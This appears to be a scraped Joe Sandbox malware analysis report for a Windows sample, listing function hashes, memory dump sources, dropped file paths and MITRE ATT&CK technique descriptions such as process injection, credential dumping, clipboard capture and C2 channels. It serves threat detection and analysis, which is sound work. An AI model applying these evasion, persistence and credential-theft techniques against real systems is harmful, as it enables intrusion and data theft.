Instruction ID: d5c9f1c8e8cf5113801b207277279754f9e1488f0f756d4950173bd6a3f67831
Opcode Fuzzy Hash: 3f5ee34258cdba8d434ba5f72ac424cf207ac477b7dc112f6b4b5b6b838faf12
Instruction Fuzzy Hash: 5E21D375684240DFDB19CF54D980B27BB62EB84314F24C669E84A4A3D6C376D847CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0030D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.730987379.000000000030D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0030D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_30d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f4484f2503ac1dd76152e1807068040f567ed6f75742fc6db0c2fa0d7344d8a
Instruction ID: 344528cc541d126ea416aa739ca753ae57b4cc96f7b926bdcdae075212e089c1
Opcode Fuzzy Hash: 1f4484f2503ac1dd76152e1807068040f567ed6f75742fc6db0c2fa0d7344d8a
Instruction Fuzzy Hash: 5A11D376505240CFDB12CF54D9C4B16BFB1FB95324F24C6A9DC094B256C33AD85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0060D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.731126361.000000000060D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_60d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42955363d26d193ed65a140d6e5309a407cd84ab7a7de183dae81fe6ffa988d7
Instruction ID: 7a9d047ed2319d3a3e1fe158dc1f4ee7873064abe2460b170ae98a6574bf8e98
Opcode Fuzzy Hash: 42955363d26d193ed65a140d6e5309a407cd84ab7a7de183dae81fe6ffa988d7
Instruction Fuzzy Hash: 9011BE75544280CFDB15CF54D9C0B16FB62EB84314F28C6AAD8494B796C33AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 024297CF Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.731641809.00000000023C5000.00000040.00000400.00020000.00000000.sdmp, Offset: 023C5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_23c5000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d99b30eeaff519077fa0ee5edc8186d71dcba2158c15bc6909ca38cf9de737d8
Instruction ID: a210e8344138c1978211d8d4ed443f16d229f6c2549d9805b9c1f48128ec457a
Opcode Fuzzy Hash: d99b30eeaff519077fa0ee5edc8186d71dcba2158c15bc6909ca38cf9de737d8
Instruction Fuzzy Hash: 11D05E84A4937BACE316B1948AB63C322A15F533D0F994156CCC15F0A2EB12D54F8103

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02429D7D Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.731641809.00000000023C5000.00000040.00000400.00020000.00000000.sdmp, Offset: 023C5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_23c5000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1015621b871bcae0bb67e3ac4c2e65eb90b711ad577722e4eb388f3de10595fc
Instruction ID: cae09ceba359bd062e9bf67bd380259fcfe7b30b476013017b6f28c60bedea31
Opcode Fuzzy Hash: 1015621b871bcae0bb67e3ac4c2e65eb90b711ad577722e4eb388f3de10595fc
Instruction Fuzzy Hash: 9CB012753826408BC206CB08C1A4F8173F2BB80D41F888058EC4043618C324D840D900

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report demand_rpkb_060923.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Myapp.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ino2belk.hky.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_preo1yfn.xtd.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0moo13g.jnc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2j4ytkz.yam.ps1

C:\Users\user\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Breddes.Byg

C:\Users\user\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil

C:\Users\user\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\efterladenskaber.nom

C:\Users\user\AppData\Roaming\Myapp\Myapp.exe

\Device\ConDrv

Static File Info

General

File Icon

Windows Analysis Report
demand_rpkb_060923.exe

Function 00403348 Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 0040535C Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00403CA7 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 0040390A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EA1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181
memoryCOMMON

Function 0040618A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre